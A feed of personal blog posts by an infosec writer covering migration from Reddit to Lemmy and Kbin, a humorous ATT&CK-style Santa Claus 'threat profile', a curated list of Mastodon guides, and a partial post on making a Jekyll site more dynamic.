Service – redirect from other area or fall back on alternative functionality
- Reposition: Are there identical services, potentially in neighbouring geographic regions, that can be repositioned to cover the mission area?
- Repurpose: Can the lost service functionality be (partially) replicated by repurposing other services? For example, email service may be used to provide some data transmission functionality similar to chat. Voice services (radio, VOIP) can be used as an alternative to digital communications (email, chat).
Operational – leverage concept of operations (CONOPS), call alternative commands for support
- Reuse: Can the missing functionality be fulfilled by reusing a similar service offered by another entity or organization?
- Retask: Can another entity or organization be retasked to complete or support the mission?

References

Threadiversal Travel

Wed, 28 Jun 2023 14:57:00 -0400

There has been a convergence of late, Reddit’s fateful decision (and the wider trend of corporate enshittification) coupled with a growing interest in the Fediverse has triggered an emergence of Reddit-esque, thread-driven, link-aggregation/discussion-board sites. The Threadiverse, as it has been coined (and now tracked) specifically refers to the bloom of Lemmy and Kbin instances (more on these later) that have spawned and are now serving as places where former Reddit-dwellers are fleeing.

I don’t intend on thoroughly covering what happened (and is continuing to happen - also this kinda thing now) with Reddit nor do I want to try to explain the Fediverse and its many virtues, but I do want to share my feelings (ramble a bit) on what the instability and uncertain future of Reddit (and other large platforms), paired with the promising future of the Threadiverse means for those of us looking to find and build meaningful and lasting communities elsewhere across the web.

I think we as denizens of the Internet have become rather lazy, thanks in large part to the trend of content/activity centralization within the behemoth platforms like Facebook, Reddit, Twitter, etc… We have become too comfortable relying solely on these companies to serve us news, articles of interest and updates from our connections, friends and family. As such, we have conceded control of these feeds (and thus our minds and perspectives) to aggressive ad-injection and the corporate algorithms designed to enrage us and maximize (toxic) engagement, all to boost profitability for these companies. For an age, we have settled for this breed of news and content because of the benefits big-social and big-tech bring, but a new age is upon us, one of accelerating enshittification. So what happens when these platforms finally sour to the enshittification point? What happens to the communities we’ve built? The connections we’ve made? The real, useful content stranded within? Where do we go?

Enter the Fediverse and the IndieWeb at large. It is here that content can once again be “ours”, connectivity made more resilient and control recaptured. Here, we are far less vulnerable to the dangers and whims of the corporate weblords hellbent on extracting every last dollar from us at the expense of our privacy. Will it be easy to reclaim the web, our content and our connections? No, but thanks to a confluence of events, i.e. the growing set of (Fediversal) tools, a more motivated / awoken general populace, and an ever-incresasing portfolio of enshittified platforms, we may at last have the aggregate energy to overthrow then reclaim the web. ⁵

Enough of that, let’s get into what the options are beyond Reddit, how to use them and why it’s a good idea…

Threadiverse & Beyond

So the Reddit exodus has begun, but where are people going? Similar communities and experiences have emerged within apps/instances of the “Threadiverse” as well as some other non-decentralized services. This guide focuses mostly on Fediverse-compatible, decentralized discussion platforms (i.e. the Threadiverse) but these other platforms are mentioned for the sake of moving away from Reddit. The list below summarizes where people are migrating…

Lemmy: Fediverse-compatible social link aggregation and discussion platform
Kbin: Open source reddit-like content aggregator and microblogging platform for the Fediverse
PieFed: A link aggregator, a forum, a hub of social interaction and information, built for the fediverse
Mbin: Decentralized content aggregator, voting, discussion, and microblogging platform running on the fediverse
NodeBB: Traditional forum platform that has recently added Fediverse support
Discourse: Open source discussion platform (which has some Fediverse connectivity options)
Tildes - non-profit community site driven by its users’ interests
Squabblr - “combines the best parts of Twitter, with the best parts of Reddit”
Raddle - reddit alternative
Lobsters - computing-focused community centered around link aggregation and discussion
Hacker News
Azorius - social link aggregator and comment forum which federates with other instances via ActivityPub
Fark

Lemmy vs Kbin

So, threadiversally speaking, what’s better, Lemmy or Kbin? Let’s start with how they are similar. Lemmy and Kbin are both link aggregators/discussion platforms centered around communities (in Kbin speak, they are called “magazines”). They both have upvotes/downvotes (e.g. mostly for post popularity rather than “karma”), sorting (e.g. “hot”, “top”, newest, “active”, etc…), thread-based posts where you can comment/reply, community subscribe, user following and are both compatible with ActivityPub and thus each other. So how do they differ? Not much really from what I can tell so far. The few notable differences are Kbin supports Mastodon/Twitter-esque microblogging as well as native “Boosting”, Kbin is a newer project (circa 2021) written in PHP versus rust-based Lemmy (circa 2019), and of course the projects are backed by different development teams *. Pick one and let’s go! ¹

* NOTE: Some within the community have expressed concerns related to Lemmy dev’s political views.

Operationalize Lemmy & Kbin

Functionally speaking, there’s not much difference between Lemmy and Kbin, so once you’ve decided which you want to start with, you can dive in and get sc-rollin’.

Getting Started

Getting started with Lemmy/Kbin is pretty easy!

Find an instance. Which instance you choose shouldn’t matter much in the end. You will be able to see, subscribe and interact with communities from other instances regardless of your home instance. One way to find an instance is to simply find a community you are interested in and join the instance that community is a part of. Some considerations for instance choosing include…
- Is this instance stable? Does it have a good admin/moderation team? Is it well-funded?
- Is this instance at risk of defederation? This typically happens if it is hosting content that is bad. If so, it is at risk of being cut off from the wider network of Threadiverse instances. This should be the nuclear approach for instance admins, but there seems to be a fair bit of fedi-drama that could result in premature or poorly-reasoned defederation.
- It’s worth noting that, unlike w/ Mastodon and other services where building a following is important, it is less so with the Threadiverse. Here, communities rule and if your instance goes belly-up for some reason, it’s very easy to create an entirely new account on a new instance and then simply re-subscribe to all your old communities. Yes, you may lose some “followers” and some post history but it shouldn’t matter as much in this context.
- * Bottom line, yes, these are things to be aware of, but you shouldn’t need to worry or care about this so don’t let it trip you up in terms of getting started.
*OPTIONAL*: If you enjoy browsing on the go, consider downloading a mobile app. I’ve enjoyed using Memmy so far.
Find and subscribe to communities (and magazines) of interest! There are a few resources to aid in finding communities. The search functionality built directly within <instance>/communities (Lemmy) and <instance>/magazines (Kbin) can also be used to find communities, even across instances! Adding a specific community is as easy as typing !<community name>@<instance name> into the search bar.
Start scrolling, reading, upvoting (or downvoting =/), replying, posting and enjoying!
*OPTIONAL but Recommended*: Support your instance (financially - connect with your instance admin to learn how), volunteer (e.g. moderate), help grow the community!

Some other guides that I’ve seen pop up across the Threadiverse can be found in the References section.

Finding Communities

Finding communities/magazines across the Fediverse of networked Lemmy/Kbin instances is easy! You can use native search functionality or you can use any of the following! With the reddit migration in full-effect, there are a few separate efforts which map sub-reddits to their new homes in the Threadiverse.

sub.rehab - instances of Reddit communities on alternative platforms
reddit migration directory
Unofficial Subreddit Migration List | quippd - A comprehensive mapping of old subreddits to new communities
Curated list of interesting instances/communities

Remember, you can interact with remote communities (communities on other instances) directly from your own. You don’t need accounts on multiple instances. Also, try not to worry about community fracturing (i.e. /c/techonology on multiple instances), you can simply follow all of them and then view them all in the aggregate “subscribed” feed. In time, I suspect these communities will coalesce or simply operate in harmony (with minimal redundant noise).

Interactivity w/ Mastodon

We refer to the network of Lemmy/Kbin instances as the “Threadiverse” because they are ActivityPub-compatible and thus part of the wider array of Fediverse applications. What does this mean beyond the Kbin <–> Lemmy interaction? Well it means there is some interactive capabilities w/ the most popular software of the Fediverse, Mastodon! I did some testing (thread 1, thread 2) not too long ago and made some observations…

NOTE: This testing was done at single point in time, using an isolated set of Lemmy/Kbin/Mastodon instances. Future updates or at-the-time configuration for any of these projects/instances could change observed behavior.

You can post to a Lemmy/Kbin community by using @<community>@<server> where the first line is the title of the post, followed by two returns and then the rest of the post is the body. This will post TO a community from your Mastodon handle. NOTE: At least for the instance I tried this on, I had issues responding to that Mastodon-originated post from my Lemmy account, but others with Lemmy accounts on other instances were able to respond, so it could be an isolated issue with my instance.
You can reply to Lemmy threads via Mastodon as well. This includes posts you originated from Mastodon, or by searching for a Lemmy post by URL within Mastodon and replying from there.
You can find Lemmy communities via Mastodon search, peruse posts and reply to them, even for communities that are otherwise locked down to just members of that community.
You can follow Lemmy/Kbin accounts from Mastodon. You can even follow communities from Mastodon!
Kbin posts, as seen from Mastodon look like this. (Fedia source)
Lemmy posts, as seen from Mastodon look like this. (infosec.pub source)
Some other Kbin <–> Mastodon stuff talked about here.

Instance Hosting & Community Management

I’m not an instance admin, nor have I ever self-hosted an instance so I won’t attempt to explain any of that, but I want to list out a few pointers related to community creation/management…

Creating a community/magazine is dead simple (as long as your instance supports open creation).
When creating a community, be mindful of the real possibility that the exact same community exists elsewhere. Not that you can’t create the same thing on a different instance, but it may make more sense for you to simply join/subscribe an existing community.
You should provide some thoughtful rules for appropriate conduct within your community. They should abide by/inherit the rules of the parent instance and be used to enforce moderation decisions.
Moderation is an extremely important property of a healthy online community. I’m no moderation expert, nor am I a particularly seasoned community manager, but I understand the importance of moderation and the difficulties that arise when attempting to perform it at scale. As the Threadiverse grows, its moderation capabilities must scale to meet demand. Rather than attempt to provide any meaningful analysis on the state of moderation capabilities within the Threadiverse, I’ll instead link to a few interesting resources/discussions I’ve come across…
- This thread from @Nadya@kbin.social on moderation
- Beehaw’s mod tools needs
- IFTAS - Non-profit team organizing to help foster and preserve inclusive, civil discourse for the common good
Fediseer - FOSS service to help Fediverse instances detect and avoid suspicious instances. (Instructions for verification)
Set out to build and grow communities that are human-centric. Cast aside traditional desires of clout-chasing, aggressive growth and monetization. Be civil, be kind and have fun!

Infosec.Pub & Fedia Cybersecurity Community

This piece should be considered software/instance/community-agnostic, it is a guide for the larger Threadiverse. That said, there are two instances, and a community within both respective instances that I have created and am actively investing time into, specifically /c/cybersecurity on infosec.pub and /m/cybersecurity on Fedia. It is no secret that I am a cybersecurity professional and avid community-engager. Between this blog, my Discord, and overall Reddit history (purposefully not linking to my handle) in various infosec-related subs, I like to think of myself as a mentor and one who is very community-forward. To add to that collection (if you will), I have stood up these two communities as (unofficial) landing spots for infosec folks fleeing big-tech-run communities like those of Reddit (namely r/cybersecurity of which I was very active).

The future of the Threadiverse is somewhat uncertain, and by somewhat I am referring to its ability to capture meaningful mindshare and daily active users, not so much its general staying power (i.e. people have proclaimed Mastodon to be dead for years and yet it is still going, and by all counts, stronger than ever these days.) But Reddit doesn’t need to die for the Threadiverse to survive, an active community just needs to exist and I plan to help foster the cybersecurity/infosec community on these platforms as best I can. The instance admin for both infosec.pub and Fedia, the venerable Jerry has done an amazing job with the various Fediverse projects/instances he nearly single-handedly deploys, maintains and administers and in him I have faith for the continued function of the instance(s). (In fact, I highly recommend you support his work if you are able to!)

So how can you get involved, participate and grow the community? It’s easy! Follow the Getting Started guide to get up and running, then much as you always have (if you’re coming from Reddit), post interesting links, engage others in (civil) discussion, report posts/comments that violate community/instance rules and if there’s anything else feel free to reach out to me on Mastodon! To help get things moving, and to recapture some of the r/cybersecurity experience, I have started up some weekly discussion threads (listed below) that I hope everyone enjoys!

* To be clear, I am not in this for any sort of Internet or community-clout/reputation building. There are many other infosec communities both within the Threadiverse and outside that I am also a part of and would encourage you to join. What’s important to me is the long-term survival and healthy operation of this community I have enjoyed during my career and I believe it is at risk while it remains centralized on the platforms that have no interest in anything other than monetization of content. Hope to see you all out there!

Conclusion

I’ll leave the pontificating for the beginning of this article. Let me conclude by simply saying, I think now is the time to embrace the Fediverse, Threadiverse, IndieWeb, whatever you want to call it. It won’t be without challenges, and I know there are technical hurdles and mental overhead, but what we lose if we don’t try has become more evident now than ever. So speak up (#threadiverse, #redditmigration, etc…) and help others take back their feeds.

Appendices

Mobile Clients

A list of Lemmy/Kbin mobile app projects. Another great list of clients can be found here.

Avelon for Lemmy
Memmy
Official Lemmy Apps directory
List of iOS/Android Kbin/Lemmy apps | Beehaw
wefwef
Jerboa
Mlem
Alexandrite (per @maegul@hachyderm.io)

Interesting Instances/Communities

A curated list of Lemmy/Kbin instances and communities I find interesting/note-worthy.

Instances

Communities

References

SANS MGT512 & GIAC GSLC Review

Wed, 28 Dec 2022 09:34:00 -0500

Threat Profile: Santa Claus

Sat, 24 Dec 2022 10:24:00 -0500

Santa Claus (and his associates, the elves) are a north-pole-based physical threat group. Specializations include advanced reconnaissance-at-scale, payload manufacturing / delivery and initial access operations (IAO). Legends indicate this group began a series of world-wide campaigns as early as 280 AD and continue to this day.

ID: G1225
Associated Names: Sinterklaas, Der Weihnachtsmann, Kriss Kringle, Père Noël, Noel Baba, Babbo Natale, Shaka Santa
Version: 1.0
Created: 24 Dec 2022
Last Modified: 24 Dec 2022

Techniques Used

Tactic	ID	Name	Use
Reconnaissance	T1595	Active Scanning	He see’s you when you’re sleeping, he knows when you’re awake…
Reconnaissance	T1592	Gather Victim Host Information	Determines household ingress points
Reconnaissance	T1589.003	Gather Victim Identity Information	He makes a list (and checks it twice)
Resource Development	T1587	Develop Capabilities	Toy manufacturing
Initial Access	T1189	Fly-by Compromise	Reindeer-based delivery system
Initial Access	T1190	Exploit Public-Facing Chimney	Preferred inital access vector via chimney
Initial Access	T1195	Supply Chain Compromise	Elves make the toys, but what do they embed?
Initial Access	T1199	Trusted Relationship	He’s pretty much invited in yeah?
Execution	T1610	Deploy Container	Lots of wrapped containers are delivered
Execution	T1053	Scheduled Task/Job	Every year, same time.
Persistence	T1525	Implant Internal Image	Quite an impression is made on the little ones.
Defense Evasion	T1562.004	Impair Defenses	Disables or modifies system fireplace
Lateral Movement	T1210	Exploitation of Remote Services	Moving from house to house
Exfiltration	T1052	Exfiltration Over Physical Medium	He takes the cookies and back up the chimney he goes!
Impact	T1485	Cookie Destruction	Nom nom nom (and drinks the milk!)
Impact	T1491	Defacement	Well between the tree, the lights, the decorations and the gift wrap, my house is always a mess…

References

12 Names for Santa Claus From Around the World
Christmas Elf
Shoutout to @esheesle@infosec.exchange for the idea!
MITRE ATT&CK Groups
MITRE ATT&CK Matrix - Enterprise
Santa Claus: Real Origins & Legend

Stars, Boosts & Toots

Thu, 17 Nov 2022 09:39:00 -0500

Mastodon! Twitter is burning!! Ahhhhh!!! The drama, right?! So what is this Mastodon thingy and what’s going on w/ Twitter? I’m delighted to tell you that I won’t really be writing much about either of those things as there are plenty of others who have done so. Never fear though, what I will do is provide you an awesome, aggregated list of guides, resources, analyses and other cool stuff that has come out on the topics of Mastodon, Twitter and the greater “Fediverse”. Now you’re thinking, “A bunch of lists you say? That sounds kinda boring…”. You’re probably right, so in addition to that I’m going to first drop my own take on Mastodon! Woooo!

* Shoutout to @mttaggart@fosstodon.org who told me not to do this. Here it is anyways!

* Oh, and if you’re on Mastodon, and so inclined, please give those I have referenced in this piece a follow, boost, like, w/e! They are awesome parts of this growing community.

Jump to Section

My Take on Mastodon
Mastodon Intro
Verification on Mastodon
Security & Privacy
Infosec Community
Hosting a Mastodon Instance
Twitter Migration
Expanded Fediverse

My Take On Mastodon So Far

There is a lot about Mastodon (and the Fediverse) that I have yet to learn, but what I do know is that it has (pretty much) already surpassed what Twitter was to me in both personal and professional contexts. I had a Twitter account for years, and try as I might, I never felt quite comfortable being anything more than a passive consumer - a lurker of those in the #infosectwitter community who had big followings. Though there was of course a decent amount of discussion/engagement within the infosec Twitter world, it often seemed to me very clique-ey, reserved only to those with big followerships or with well-known personas and established circles. I also always had the sense that trying to cultivate a following on Twitter was, sorta cringey. People there seemed more interested in boosting their follower counts or their follower-to-following ratio than expanding their true community. This feeling was ever-perpetuated by the constant deluge of tweets sounding off about how many followers they had, or how close they were to a certain follower threshold, etc…

Look, I get it - I have a blog, a podcast, I understand why people crave followers. It’s the engagement I am after though, not so much just having my tweets/toots/posts/stuff show up in a lot of people’s timelines. I genuinely enjoy sharing my thoughts/ideas, and even moreso hearing/learning from others. Naturally, a good way to create this engagement is to network, follow a lot of people and of course, have others “follow” me. I never had a big following on Twitter (~190ish as of the last time I looked), and I never got much engagement there (partially because I rarely posted). I’ve been on Mastodon for nearly 2 weeks and already I’ve seen much better engagement (and I am not alone). Maybe it’s the novelty factor, or maybe it’s because it hasn’t had time to turn into a toxic stew, it could be because I am more actively engaging. I’m not really sure yet, but what I do know is the vibe is different. That sense of community is definitely there and I am looking to make the most of it.

Alright, so I have a few other thoughts/takes on my Mastodon experience so far, and as I am want to do, I will share via a list!

As others have pointed out, two reasons why Twitter always felt a bit, icky, was because of forced ads in your timeline and the bedeviling algorithm which fed not what YOU wanted into your timeline, but what Twitter thought would yield maximum engagement, which typically meant trying to fill you with rage. Mastodon is a breath of fresh air in comparison.
I joined the infosec.exchange instance, which is relatively quite large (~24k and growing) and have followed nearly 400 people so far. What I’ve seen across my home feed and the local timeline has been really great! No ads, literally just what I’ve signed up for. I’ve been consuming/scrolling most of it so far and have encountered a lot of new people and genuinely look forward to (most) of what they have to share.
Mastodon is a series of unique, networked instances. When folks from other instances are boosted into my timeline, there is a sense of excitement, of exploration. For example, if I see someone with the handle @hax@supercyber.pizza, I think “wow! I’m happy to have discovered this indvidual in the wide Fediverse, and look forward to what they post/boost into my timeline”. That hunger to follow, to connect moreso than “get followers” is really great. I have this desire to collect as many cool instances and awesome people as I can into my following list.
If you want people to follow you, or engage with you, I highly recommend spending some time to tell people what you’re all about in your account profile. Also, toss a picture of some kind in there. Anything will do.
Each instance will likely have its own culture, traditions and of course rules. Spend some time trying to figure out what those are, and leverage the content warning (CW) feature to try and be a little less offensive. It’s not hard to do!
Being on an instance which has a population that best shares your personal/professional interests will give you a local timeline that will help you find people to follow and consume your posts. This is true. But! With a little effort, you can, regardless of what instance you are on, curate a following of people across instances, building a home timeline that is perfect for you, void of ads or algorithmic influences. This feed/timeline will continue to grow and mature thanks to the boosts and discussions of those you follow and engage with. So spend less time trying to find the perfect instance, and more time building that list.

If there is any drawback to Mastodon so far that I have seen, it is the lack of full-text search (for privacy reasons). This makes some of the intel-gathering I used to do on Twitter a bit more difficult (I’m not the only one with this sentiment). One frequent use-case was to search for info on CVEs (e.g. PoCs, research, etc…). To address this concern, the infosec community on Mastodon has been putting their heads together on how best to use hashtags to make intel-gathering possible on Mastodon. ^{1, 2, 3}

Mastodon

Intro to Mastodon

To avoid writing a regurgitated “how to get started w/ Mastodon” section, I’m going to first just link to the Wired article on this - How to Get Started on Mastodon. Again, I want to emphasize - try not to stress too much on what “instance” you choose. This should only really affect your “local” timeline, not your ability to follow those anywhere, on any instance (unless you wish to follow the dregs of the Fediverse that tend to get de-federated from the upstanding servers). Alternatively, for those that are adventurous, have some free time and are relatively tech savvy, hosting your own instance on a vanity domain is another option! If you don’t end up liking an instance you’ve landed on, check out how to migrate from one server to another. OK, that out of the way, here’s a list of other Mastodon stuff…

Find an instance via instances.social
How To Use Mastodon and the Fediverse via Fedi.Tips
Some general Mastodon etiquette from @chrisabides@infosec.exchange
A Twitter User’s Guide to Mastodon from Marcus Hutchins
Tips for Mastodon newcomers from @Em0nM4stodon@infosec.exchange
Useful Mastodon guides courtesy of @klillington@mastodon.ie
Mastodon.help
A Twitter Off Ramp
Getting started with Mastodon per @rauschma@fosstodon.org
Some more Mastodon tips from @davewalker@mastodon.social
What Everyone Seems to Get Wrong About Mastodon per @ajroach42@retro.social
Mastodon migration, moving to a new server per @Patricia@vivaldi.net
Mastodon–and the pros and cons of moving beyond Big Tech gatekeepers
How to talk to your relatives about Mastodon
The Mastodon’s Guide to the Fediverse
Mastodon Quick Start Guide

Quick (I promise) rundown of Mastodon verbiage/mechanics…

Posts ~~are~~ were “Toots”, now they’re just “posts”. Ask your instance admin to tootify the server if you miss tootin’ (via @benjaminhollon@fosstodon.org)
A re-post (or re-tweet) is a “Boost”. There is no quote-boost, so don’t ask. Boosting helps propagate stuff you like to all your followers and to your local timeline. This helps get stuff out to other instances. Boosts are good.
A “Star” simply communicates to the OP, “I like that”. It has no effect on anything else. So star star star away!
Lists exist.
Unlike Twitter, Mastodon has no full-text search. It instead relies on hashtags. So use those liberally where applicable. You can also follow hashtags. (per @tinker@infosec.exchange)
The consensus seems to be that the first-party Mastodon client is bad. Try some of these other apps instead…
- Metatext for iOS
- Fedilab for Android
- Tusker (from @jxhn@infosec.exchange)
One cool thing you can do via Mastodon is retrieve a .rss feed of an account’s posts per @SteveD3@infosec.exchange

Now get out there and toot to your hearts content!

Verification

Mastodon has a verification capability, though it differs from what Twitter traditionally offered. Essentially, you can establish a “verified” relationship between your Mastodon account and other third-party endpoints, such as a website. What this can prove is that, for example, the identity/person behind the @shellsharks@sehllsharks.social Mastodon account is the same person who runs shellsharks.com. Some other verification related resources are provided below.

Thoughts on Mastodon verification from @barubary@infosec.exchange
How to verify your GitHub via a thread on infosec.exchange
KeyOxide - A privacy-friendly tool to create and verify decentralized online identities. For help using KeyOxide on Mastodon, check out this thread per @projectdp@infosec.exchange or this from @IntlLawGnome@law.builders
If Keybase is your jam, check out this article on Keybase verification or this infosec.exchange wiki article on Keybase verification
For WordPress users, check out Mastodon, WordPress, and Verification per @TindrasGrove@infosec.exchange
For a Twitter-similar, centralized “verification” offering, check out Fedified (via @gossithedog@infosec.exchange)
Using rel=”me” on Wix-hosted site

Security & Privacy

Is Mastodon secure? Is my data private? Is it more secure than Twitter? (these days, almost assuredly). How can I best lock down my Mastodon account(s)? All great questions. I’ll share a list of articles that best answer these questions but first, some basic security/privacy hygiene advice. Use a strong/unique password, enable 2FA, understand that your instance admin has access to your data.

Is Mastodon Private and Secure? via EFF.org
Graham Cluley’s take on security and privacy on Mastodon
Can Mastodon Survive Europe’s Digital Services Act? per @profcarroll@federate.social
GDPR and Mastodon, analysis by @missiggeek@freeradical.zone
(GDPR-related) Record of Processing Activities per @RGrunblatt@sciences.re
The venerable PortSwigger has already gone to work bug hunting Mastodon (The Daily Swig). Point being, vulns do exist. Stay frosty
For those interested in TOTP MFA on desktop (per @tinker@infosec.exchange)
Private messaging is not recommended on Mastodon. For this, other options are available, as discussed by @atomicpoet@mastodon.social
More Mastodon Scraping without Consent per @robertwgehl@scholar.social
For those interested in security testing a live Mastodon instance, check out cybervillains.com
How to use a security key as two-factor authentication on your Mastodon account

Infosec Community

I have used Twitter for years, as there was a relatively vibrant #infosec community that shared research, articles, etc… With the meltdown of Twitter, it seems the infosec-Twitter diaspora has gone full-force and we (as a community) now primarily exist across a variety of Mastodon instances. The community that has developed, and the speed at which it has developed, has been truly astounding to behold. For my part, I joined infosec.exchange.

If you’re looking to find others in the infosec world on Mastodon…

Gsheet with a mapping of Twitter–>Mastodon accounts
Infosec Mastodon Lists! from tisiphone.net
Or join an open infosec instance and just start following people! Pro tip: you can (for open instances) view the local timeline for any instance, whether you are a member or not

I’ve written up a quite note - a “starter pack” - for those new to Mastodon. It includes some bonus info for infosec folks.

infosec.exchange

infosec.exchange is described as “a Mastodon instance for info/cyber security-minded people.” No better way to describe it! It was stood up and is admin’ed by Jerry Bell (host of the Defensive Security Podcast and seemingly trustworthy infosec fella.) So far, the experience as a member of this server has been great. The community is very infosec-ey, friendly and growing quickly. Some other cool tidbits on infosec.exchange have been provided below…

There is an infosec.exchange wiki!
Currently, infosec.exchange supports 11k word posts. ELEVEN THOUSAND! Plenty of elbow room
Running a Mastodon instance, and doing it as well as Jerry has takes time, expertise, patience and money. To help out, consider contributing via liberapay
Anecdotally (and from multiple accounts I have seen from infosec.exchange members so far), engagement on posts/polls/replies has been outstanding - easily outpacing what others saw on Twitter, even with much more massive follower counts
infosec.exchange very quickly ramped from ~300 to over 20k (24k at the time of this post) in a matter of weeks. So donate and consider configuring post auto-delete (per @spapjh@infosec.exchange)
For those interested in Jerry’s stance on GDPR, check this wiki article (from @jerry@infosec.exchange)

Infosec Instances

A running list of infosec-related/adjacent Mastodon instances.

Hosting a Mastodon Instance

There are plenty of great, open instances to join if you are interested in Mastodon. But if you’re interested in hosting your own server, that too is possible! In fact, I plan on trying this out at some point. For anyone interested, and for reference myself when the time comes, here are some resources/discussions I have collected…

Scaling Mastodon - Part 1
Thread on running personal instance from @laurence@someone.elses.computer
Spinning up Mastodon on DigitalOcean (from @Tinker)
Thoughts on Mastodon media storage from @mastohost@mastodon.social
Thread on Mastodon hosting (from Reddit).
Notes on nginx confs per @sickcodes@sick.social
Some tools for running small instances courtesy of @markus@uxp.de
Scaling Mastodon in the Face of an Exodus
On Running a Mastodon Instance from @rixx@chaos.social
Running a Mastodon Instance using docker-compose per @ben@mastodon.bentasker.co.uk
Enabling the translation service per @charlesdardaman@infosec.exchange
Build Your Own Mastodon Server on Debian from @donwatkins@fosstodon.org
Notes on setting up a Mastodon instance from @Adman@infosec.exchange
mastodon-on-aws per @honyocker@mastodon.social
Mitigate potential liability by registering with copyright office and designating an agent to receive DMCA reports - per @rahaeli@infosec.exchange
A guide to potential liability pitfalls for people running a Mastodon instance
Hachyderm Infrastructure
Mastodon with Docker and Traefik
Mastodon Privacy Policy Generator per @rriemann@chaos.social
Single-node deployment of Mastodon on Linux w/ Flatcar per @ahrkrak@hachyderm.io
Mastodon and Self-Hosting
Scaling Mastodon with systemd Template Units
Alias your Mastodon Username to your own Domain with Jekyll per @philnash@mastodon.social
Setting up your own Mastodon instance with Hetzner and NixOS per @romeo@social.romeov.me
Notes on operating fediver services from an English law point of view
User Generated Content and the Fediverse: A Legal Primer
Mastodon Instance Operators Report on the Impact of the #TwitterMigration
Welcome to Wildebeest: the Fediverse on Cloudflare
Mastoreqs.com from @vmstan@vmst.io
Common Abuses on Mastodon: A Primer
Running a Mastodon instance entirely free forever
The Architecture of Mastodon

Twitter Migration

I’m not particularly interested in analyzing or writing much about what’s going on w/ Twitter. What I will say is that I’ve pretty much left (my account still exists but I am no longer looking at my feed and haven’t signed in since I joined Mastodon), and generally speaking, the infosec community seems to have almost fully disowned the platform. From what I have read and seen, it does seem to have turned into a dumpster fire. I know not what the future holds for Twitter, but for many reasons I am happy with where I have landed and look forward to making Mastodon my long-term home, regardless of Twitter’s ultimate fate. That said, if you are interested in moving yourself or reading more about the #twittermigration, check out the resources below.

Home Invasion, thoughts on the mass-move to Mastodon.
Twitter migration resources from @stevepdp@mstdn.social
Deleting DMs from Twitter using the GDPR per @mikarv@someone.elses.computer
Twitter alternative: how Mastodon is designed to be “antiviral” per @clive@saturation.social
Search for Mastodon accounts of the people you followed on Twitter via Debirdify
Extract fediverse handles of your Twitter followings via Fedifinder
Bulk-delete your tweets using tweetdelete per @gossithedog@infosec.exchange
Recover your Twitter threads using Get-TwitterThread per @Lee_Holmes@infosec.exchange
It’s time. Delete your Twitter DMs (Graham Cluley)
semiphemeral - Automatically delete your old tweets, except for the ones you want to keep.

Expanded Fediverse

I joined Mastodon in 2018, but never really made much of it at the time. I rejoined in earnest in November (2022) so I am obviously not a Mastodon pro nor particularly experienced/knowledgeable about the wider “Fediverse”. So I won’t pretend to be. Instead, here is some stuff that you may be interested in, and that I will continue to dig into as I have time…

Hints and tips about Mastodon and the Fediverse via Fedi.Tips
BookWyrm is the Fediverse altnernative to GoodReads
Some analysis on the existential threat to the Fediverse/Mastodon
Twitter’s demise is ActivityPub’s future per @ariadne@treehouse.systems
After self-hosting my email for twenty-three years I have thrown in the towel. The oligopoly has won.
Tailscale on the Fediverse
Is the fediverse about to get Fryed?… via @timbray@mastodon.cloud
The Man Behind Mastodon Built It for This Moment
Solid Project from @Dcuthbert@noc.social
Mapstodon via @crankylinuxuser@infosec.exchange
Find verified journalists on Mastodon PressCheck.org
The Fediverse Could be Awesome (if we don’t screw it up)
Academics on Mastodon
The Fediverse As Composable Distributed Applications per @webmink@meshed.cloud
Journalists on Mastodon per @terihannigan@mstdn.social
The many branches of the Fediverse
honk
Finding Fediverse Feeds per @KelsonV@wandering.shop
The Fediverse Wiki
Catodon
FediScanner - Check Hashtag in the Fediverse
Fediverse Fans - Organize lists of users on Mastodon-compatible platforms by their interests

MastoDeck
Tootfinder - Proof of concept of an opt-in global Mastodon full text search.
Fediverse People Directory
Mastodon Server Convenant
the doodle project - small hosted fediverse instances
Top Mastodon Posts
MastoMetrics
Analytodon
Metricdon
Trunk
Torified Fedi Links - List of Fediverse instances that provide access through .Onion servers. (per @catsalad)
Fedi on Fire 🔥
Fedigov.eu
Agora
FeedSeer
HashTag Place
Tuba
Collections of Mastodon resources
MastoFeed
JustMyToots (Change @username & @instance as appropriate)
Fediverse.info
fediview
Sepia Search - PeerTube search engine
Fedi CW
MastoVue - Peek into any public Mastodon Timeline or search for Hashtags
Mastodon List Manager
Fedi Circles
PodcastAP
MastoAnswers
Guide for using Mastodon search
THE COUNTERFORCE GUIDE TO MASTODON AND THE FEDIVERSE (FOR PUNKS!)

Dynamization of Jekyll

Thu, 25 Aug 2022 14:23:00 -0400

Jekyll is a framework for creating websites/blogs using static plain-text files. Jekyll is used by GitHub Pages, which is also the current hosting provider for Shellsharks.com. I’ve been using Git Pages since the inception of my site and for the most part have no complaints. With that said, a purely static site has some limitations in terms of the types of content one can publish/expose.

I recently got the idea to create a dashboard-like page which could display interesting quantitative data points (and other information) related to the site. Examples of these statistic include, total number of posts, the age of my site, when my blog was last updated, overall word count across all posts, etc… Out of the box, Jekyll is limited in its ability to generate this information in a dynamic fashion. The Jekyll-infused GitHub pages engine generates the site via an inherent pages-build-deployment Git Action (more on this later) upon commit. The site will then stay static until the next build. As such, it has limited native ability to update content in-between builds/manual-commits.

To solve for this issue, I’ve started using a variety of techniques/technologies (listed below) to introduce more dynamic functionality to my site (and more specificially, the aforementioned statboard).

Jekyll Liquid
JavaScript & jQuery
Git Actions
Advanced Git Actions (*Future Update!*)

Jekyll Liquid

Though not truly “dynamic”, Liquid* templating language is an easy, Jekyll-native way to generate static content in a quasi-dynamic way at site build time. As an example, if I wanted to denote the exact date and time that a blog post was published I might first try to use the Liquid template {{ site.time }}. What this actually ends up giving me is a time stamp for when the site was built (e.g. 2026-04-19 02:34:56 -0400), rather than the last updated date of the post itself. So instead, I can harness the posts custom front matter, such as “updated:”, and access that value using the tag {{ page.updated }} (so we get, __).

One component on the (existing) Shellsharks statboard calculates the age of the site using the last updated date of the site (maintained in the change log), minus the publish date of the first-ever Shellsharks post. Since a static, Jekyll-based, GitHub Pages site is only built (and thus only updated) when I actually physically commit an update, this component will be out of date if I do not commit atleast daily. So how did I solve for this? Enter Git Actions.

* Learn more about the tags, filters and other capabilities of Liquid here.

JavaScript & jQuery

Before we dive into the power of Git Actions, it’s worth mentioning the ability to add dynamism by simply dropping straight up, in-line JavaScript directly into the page/post Markdown (.md) files. Remember, Jekyll produces .html files directly from static, text-based files (like Markdown). So the inclusion of raw JS syntax will translate into embdedded, executable JS code in the final, generated HTML files. The usual rules for in-page JS apply here.

